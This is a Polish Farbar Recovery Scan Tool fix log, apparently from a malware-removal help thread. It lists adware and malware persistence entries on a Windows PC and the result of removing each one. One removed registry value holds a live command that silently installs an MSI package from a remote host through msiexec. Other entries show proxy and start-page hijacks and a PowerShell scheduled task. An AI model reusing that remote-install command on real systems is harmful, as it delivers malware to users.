Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 06-05-2017
Uruchomiony przez Kris (07-05-2017 04:32:51) Run:2
Uruchomiony z C:\Users\Kris\Downloads
Załadowane profile: Kris (Dostępne profile: Kris)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {21CCB704-AB01-427E-B904-3590081354CD} - \SystemToolsDailyTest -> Brak pliku <==== UWAGA
Task: {671B90D7-2821-4376-85F7-7D3B5FE6EACA} - \Milimili -> Brak pliku <==== UWAGA
Task: {67E32AC8-0D22-4518-BD83-6999DE3BD7AC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
ShortcutWithArgument: C:\Users\Kris\Desktop\Software\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGKjdhx1sXu8CuYCS%2BMYEvNgv7FP7Xd2TZZRXRwYgKOyPaM9Tqsu%2FMvPi8wooPyk%3Dhoi
Winlogon\Notify\igfxcui:
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Run: [background_fault] => C:\Users\Kris\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA
C:\Users\Kris\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjwdRkJSM8NLOThLNjJWMWH5MjFxMdw3RWLLRTEyRq== /q
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\Explorer: []
\HKU\S-1-5-18\...\RunOnce: [panda4_2dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f
HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f
IFEO\DisplaySwitch.exe: [Debugger]
GroupPolicy-x32: Ograniczenia <======= UWAGA
GroupPolicyScripts-x32: Ograniczenia <======= UWAGA
AutoConfigURL: [S-1-5-21-3990190956-98265678-2498883457-1001] => hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844
ManualProxies: 0hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms}
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Zoohair
RemoveDirectory: C:\Users\Kris\AppData\Local\Zoohair
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Brak podpisu cyfrowego]
R2 Kitty; C:\Users\Kris\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
R2 SNARE; C:\Users\Kris\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X]
U2 McMPFSvc; Brak ImagePath
S3 OATool; \??\C:\Users\ADMINI~1\AppData\Local\Temp\OAToolx64.sys [X] <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Kris\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Kris\AppData\Local\Firefox
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
FirewallRules: [{C1AAC7C0-CFC0-476B-9704-8C4E1786E18C}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Kris\AppData\Local\Mozilla
C:\Users\Kris\AppData\Roaming\Mozilla
C:\Users\Kris\AppData\Roaming\Profiles
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Kris\AppData\Local
CMD: dir /a C:\Users\Kris\AppData\LocalLow
CMD: dir /a C:\Users\Kris\AppData\Roaming
RemoveProxy:
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.
Punkt przywracania został pomyślnie utworzony.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21CCB704-AB01-427E-B904-3590081354CD} => klucz nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemToolsDailyTest => klucz nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{671B90D7-2821-4376-85F7-7D3B5FE6EACA} => klucz nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67E32AC8-0D22-4518-BD83-6999DE3BD7AC} => klucz nie znaleziono.
C:\Windows\System32\Tasks\Windows-PG => nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => klucz nie znaleziono.
C:\Users\Kris\Desktop\Software\Google Chrome.lnk => Skrót - argument pomyślnie usunięto.
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui => klucz nie znaleziono.
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość nie znaleziono.
"C:\Users\Kris\AppData\Local\background_fault\aswRD.exe" => nie znaleziono.
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość nie znaleziono.
HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\ => Wartość nie znaleziono.